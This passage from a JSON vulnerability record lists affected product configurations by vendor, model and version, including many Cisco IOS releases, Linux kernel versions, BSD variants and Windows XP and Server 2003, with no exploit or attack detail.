        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0st"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2sw"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2ey"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(5\\)wc9"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4\\(2\\)xb"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2sh"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4\\(3\\)t2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.35"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.17.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.19.4"
      },
      {
        "model": "windows server 2003",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.10"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(8.0.2\\)s"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(11\\)t9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.32"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(21\\)st7"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2yn"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(4\\)xk3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.25"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.3wa4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.22"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": "2.0.4"
      },
      {
        "model": "openbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "3.8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2yr"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": "3.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(13\\)zd"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1xp"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(17d\\)sxb10"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1ax"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)yb"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.64"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.23.5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(14\\)ym4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2zg"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(14\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(2\\)xf5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)sl1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.18.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(5\\)xs"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "2.1.7"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "6.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(2b\\)"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": "1.5.1"
      },
      {
        "model": "catalyst blade switch 3120",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(50\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "8.3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(28\\)w5\\(31a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(22\\)ea5a"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.33"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(17d\\)sxb7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.37"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0xc"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(8\\)t8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1xr"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(7.7\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(6.8a\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.59"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(3d\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3xa"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(26\\)w5\\(28\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2xs"
      },
      {
        "model": "windows xp",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "3.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.45"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(12\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(3a\\)xi8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)xr"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(13\\)zd4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2xf"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.13.3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(3\\)xp4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(15\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(25\\)sw4a"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(4\\)xg1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.25"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)yf2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(20\\)ew2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(26\\)p2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)dd3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1xb"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": "1.2.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)mb13b"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.26"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(22\\)ea6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(11\\)yf3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(22\\)sv1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(11b\\)e"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2pi"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "10.3\\(3.4\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.32"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(13\\)zk"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(7\\)t12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.23.7"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(18\\)st1"
      },
      {
        "model": "dragonflybsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dragonflybsd",
        "version": "1.10.1"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "3.5"
      },
      {
        "model": "bsd os",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "bsdi",
        "version": "1.1"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "6.3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(7\\)ja"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2yz"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.38"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)t1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.2.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.14"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(25\\)ewa3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(20a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3xs"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1xw"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(8\\)xu2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(25\\)s1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(16\\)bx"
      },
      {
        "model": "openbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "4.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)yi"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22.4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(20\\)ewa"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)yi1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(20\\)ec2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(13\\)ew"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(11\\)yk1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)ya11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.31"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(12h\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(11\\)t4"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": "1.5"
      },
      {
        "model": "openbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "2.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(14\\)sz1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(27\\)sv1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(9\\)aa"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(15\\)ca"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(11\\)yk2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(19\\)sl4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(17\\)s4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.11.11"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(14\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "9.14"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0da"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.13"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2xz"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5c\\)ex"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(23\\)sw"
      },
      {
        "model": "openbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "2.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(30\\)s2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(20\\)ewa3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.27"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)xh3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(23\\)s5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2xc"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.17.10"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(7\\)da"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(8.3\\)sc"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.23.4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(16\\)ia"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(28a\\)ct"
      },
      {
        "model": "openbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "2.4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2gs"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(18\\)sxd7"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(3e\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(13a\\)bc"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2e"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(27\\)sv2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4\\(3a\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.2.1"
      },
      {
        "model": "openbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": null
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(11\\)yl"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(4\\)xm4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(13\\)ca"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.46"
      },
      {
        "model": "openbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "2.5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(14\\)sz"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5c\\)e12"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "2.0.5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0xn"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2bx"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(19\\)e1"
      },
      {
        "model": "openbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "2.3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2bc"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(9e\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(1\\)xa"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(17\\)sl9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.43"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.23.1"
      },
      {
        "model": "openbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "3.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(26\\)w5\\(28a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(15\\)sc"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.21.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.29"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(21\\)sx"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(20\\)eo1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(9\\)e3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(10\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)bx"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(1\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2sa"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(14\\)za"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0wc"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(7\\)dc1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.43"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(25\\)fx"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(10d\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.2.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.17.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(5\\)xk"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(31\\)s1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)db1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.2.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.27"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(13\\)ew4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2ja"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(5\\)wc9a"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.23.9"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(6\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)bc2f"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(7\\)cx"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(14\\)sy"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.18.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(20\\)s4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(3\\)xt"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)t"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.47"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2p"
      },
      {
        "model": "ios",
